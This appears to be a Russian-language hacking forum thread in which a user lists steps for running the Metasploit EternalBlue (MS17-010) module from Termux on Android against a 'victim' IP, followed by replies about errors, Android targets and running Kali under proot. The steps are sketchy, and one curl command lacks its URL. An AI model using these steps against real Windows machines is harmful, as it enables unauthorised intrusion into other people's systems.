Решено EternalBlue на Termux

X

Xyrox

Во-первых, что такое Termux.
Termux - это терминал с множеством пакетов, как тот же самый git или nmap.
В общем, у Termux'а очень много полезных фич для пентеста и для простого хакинга.
Я копался по Codeby, пытался прочитать логи, ибо я криворукий и уже закинув на всю эту затею, я залез поискать в интернете что нибудь поинтересней. И я нашёл такой вирус, как EternalBlue, за который нужно благодарить хаккерскую группу The Shadow Brokers.
Сегодня я буду пытаться эксплуатировать уязвимость нашего EternalBlue на терминале Termux.
1) Устанавливаем сам Termux из Play Маркета.
2) Открываем терминал и прописываем команду: pkg install curl
3) После этого прописываем curl -LO
4) Жди пока он будет оч долго грузится, а потом прописываем msfconsole.
5) Пятым делом прописываем use exploit/windows/smb/ms17_010_eternalblue
6) Set RHOST локальный ip жертвы.
Вот и все шаги, проверяйте, показывайте результаты, может я где-то мог сделать ошибку.
 
@Xyrox, в чем проблема?
 

Вложения

  • IMG_20190803_175929.jpg
    IMG_20190803_175929.jpg
    149,5 КБ · Просмотры: 931
А можно эту фигню для взлома андроид использовать?

Если вы про еnternablue, то его НЕЛЬЗЯ использовать для взлома андройд.
Этот эксплоит использует уязвимости SMB протокола в WINDOWS! Он нацелен исключительно на ОС Windows и может эксплуатировать только её.

Что касаемо msf - meterpreter в руки.
Эксплоиты для сетевого стека Android в MSF не наблюдал.
Благо в открытом доступе есть обширные бд эксплоитов, уязвимостей. А дальше уже сами :)
 
  • Нравится
Реакции: Tim Pumpkin
Почему возникает такая ошибка?
 

Вложения

  • Screenshot_2019-12-23-18-45-03-757_com.termux.jpg
    Screenshot_2019-12-23-18-45-03-757_com.termux.jpg
    155,8 КБ · Просмотры: 675
тема странная, но мне всегда было интересно, это работает только в локальной сети? или нет
 
Во-первых, что такое Termux.
Termux - это терминал с множеством пакетов, как тот же самый git или nmap.
В общем, у Termux'а очень много полезных фич для пентеста и для простого хакинга.
Я копался по Codeby, пытался прочитать логи, ибо я криворукий и уже закинув на всю эту затею, я залез поискать в интернете что нибудь поинтересней. И я нашёл такой вирус, как EternalBlue, за который нужно благодарить хаккерскую группу The Shadow Brokers.
Сегодня я буду пытаться эксплуатировать уязвимость нашего EternalBlue на терминале Termux.
1) Устанавливаем сам Termux из Play Маркета.
2) Открываем терминал и прописываем команду: pkg install curl
3) После этого прописываем curl -LO
4) Жди пока он будет оч долго грузится, а потом прописываем msfconsole.
5) Пятым делом прописываем use exploit/windows/smb/ms17_010_eternalblue
6) Set RHOST локальный ip жертвы.
Вот и все шаги, проверяйте, показывайте результаты, может я где-то мог сделать ошибку.
Лучше поставить arm версию kali, в том же термуксе, запустить ёё посредством chroot или proot
и оттуда, из под кали, уже поставить себе нормальный людской msf
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab